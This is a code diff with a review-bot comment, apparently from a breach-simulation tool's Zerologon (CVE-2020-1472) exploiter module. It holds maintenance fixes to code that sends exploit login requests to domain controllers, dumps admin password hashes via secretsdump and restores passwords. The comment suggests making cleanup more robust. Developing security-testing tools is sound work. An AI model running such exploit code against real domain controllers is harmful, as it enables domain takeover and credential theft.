Testing changes
parent
2c2a9eaaae
commit
0866aee2cf
|
@ -3,15 +3,13 @@ Zerologon, CVE-2020-1472
|
||||||
Implementation based on https://github.com/dirkjanm/CVE-2020-1472/ and https://github.com/risksense/zerologon/.
|
Implementation based on https://github.com/dirkjanm/CVE-2020-1472/ and https://github.com/risksense/zerologon/.
|
||||||
"""
|
"""
|
||||||
|
|
||||||
import io
|
|
||||||
import logging
|
import logging
|
||||||
import os
|
import os
|
||||||
import sys
|
|
||||||
from binascii import unhexlify
|
from binascii import unhexlify
|
||||||
from typing import List, Optional
|
from typing import List, Optional
|
||||||
|
|
||||||
import impacket
|
import impacket
|
||||||
from impacket.dcerpc.v5 import epm, nrpc, transport
|
from impacket.dcerpc.v5 import nrpc
|
||||||
from impacket.dcerpc.v5.dtypes import NULL
|
from impacket.dcerpc.v5.dtypes import NULL
|
||||||
|
|
||||||
from common.utils.exploit_enum import ExploitType
|
from common.utils.exploit_enum import ExploitType
|
||||||
|
@ -57,6 +55,8 @@ class ZerologonExploiter(HostExploiter):
|
||||||
LOG.debug("Attempting exploit.")
|
LOG.debug("Attempting exploit.")
|
||||||
_exploited = self._send_exploit_rpc_login_requests(rpc_con)
|
_exploited = self._send_exploit_rpc_login_requests(rpc_con)
|
||||||
|
|
||||||
|
rpc_con.disconnect()
|
||||||
|
|
||||||
else:
|
else:
|
||||||
LOG.info("Exploit failed. Target is either patched or an unexpected error was encountered.")
|
LOG.info("Exploit failed. Target is either patched or an unexpected error was encountered.")
|
||||||
_exploited = False
|
_exploited = False
|
||||||
|
@ -73,12 +73,13 @@ class ZerologonExploiter(HostExploiter):
|
||||||
return _exploited
|
return _exploited
|
||||||
|
|
||||||
def is_exploitable(self) -> bool:
|
def is_exploitable(self) -> bool:
|
||||||
if self.host.services[self.zerologon_finger._SCANNED_SERVICE]['is_vulnerable']:
|
if self.zerologon_finger._SCANNED_SERVICE in self.host.services:
|
||||||
return True
|
return self.host.services[self.zerologon_finger._SCANNED_SERVICE]['is_vulnerable']
|
||||||
return self.zerologon_finger.get_host_fingerprint(self.host)
|
return self.zerologon_finger.get_host_fingerprint(self.host)
|
||||||
|
|
||||||
def _send_exploit_rpc_login_requests(self, rpc_con) -> Optional[bool]:
|
def _send_exploit_rpc_login_requests(self, rpc_con) -> Optional[bool]:
|
||||||
# Max attempts = 2000. Expected average number of attempts needed: 256.
|
# Max attempts = 2000. Expected average number of attempts needed: 256.
|
||||||
|
result_exploit_attempt = None
|
||||||
for _ in range(0, self.MAX_ATTEMPTS):
|
for _ in range(0, self.MAX_ATTEMPTS):
|
||||||
try:
|
try:
|
||||||
result_exploit_attempt = self.attempt_exploit(rpc_con)
|
result_exploit_attempt = self.attempt_exploit(rpc_con)
|
||||||
|
@ -154,6 +155,10 @@ class ZerologonExploiter(HostExploiter):
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
LOG.error(e)
|
LOG.error(e)
|
||||||
|
|
||||||
|
finally:
|
||||||
|
if rpc_con:
|
||||||
|
rpc_con.disconnect()
|
||||||
|
|
||||||
def get_admin_pwd_hashes(self) -> str:
|
def get_admin_pwd_hashes(self) -> str:
|
||||||
try:
|
try:
|
||||||
options = OptionsForSecretsdump(
|
options = OptionsForSecretsdump(
|
||||||
|
@ -295,8 +300,9 @@ class ZerologonExploiter(HostExploiter):
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
LOG.info(f"Exception occurred while removing file {path} from system: {str(e)}")
|
LOG.info(f"Exception occurred while removing file {path} from system: {str(e)}")
|
||||||
|
|
||||||
def _send_restoration_rpc_login_requests(Self, rpc_con, original_pwd_nthash) -> Optional[bool]:
|
def _send_restoration_rpc_login_requests(self, rpc_con, original_pwd_nthash) -> Optional[bool]:
|
||||||
# Max attempts = 2000. Expected average number of attempts needed: 256.
|
# Max attempts = 2000. Expected average number of attempts needed: 256.
|
||||||
|
result_restoration_attempt = None
|
||||||
for _ in range(0, self.MAX_ATTEMPTS):
|
for _ in range(0, self.MAX_ATTEMPTS):
|
||||||
try:
|
try:
|
||||||
result_restoration_attempt = self.attempt_restoration(rpc_con, original_pwd_nthash)
|
result_restoration_attempt = self.attempt_restoration(rpc_con, original_pwd_nthash)
|
||||||
|
|
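Review bot: The `finally` block added in the hunk at `-154,6 +155,10` tests `if rpc_con:`, but the `try` it closes opens outside the hunk, so if `rpc_con` is first bound inside that `try`, a failure before the binding would raise `UnboundLocalError` from `finally` right after the original error was logged; initialising `rpc_con = None` before the `try` would avoid that. The hunk at `-57,6 +55,8` appears to do the same cleanup with a bare `rpc_con.disconnect()` after `_send_exploit_rpc_login_requests(rpc_con)`, which is skipped if that call raises, so a `try`/`finally` there would keep the two cleanup paths consistent and avoid leaving a session open to the domain controller. In `is_exploitable`, `self.host.services[self.zerologon_finger._SCANNED_SERVICE]['is_vulnerable']` still assumes the key exists once the service entry is present; `.get('is_vulnerable', False)` may be safer if the fingerprinter can store an entry without it.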
|
@ -1,7 +1,5 @@
|
||||||
import io
|
|
||||||
import logging
|
import logging
|
||||||
import os
|
import os
|
||||||
import sys
|
|
||||||
import traceback
|
import traceback
|
||||||
|
|
||||||
from impacket.examples.secretsdump import (LocalOperations, LSASecrets,
|
from impacket.examples.secretsdump import (LocalOperations, LSASecrets,
|
||||||
|
|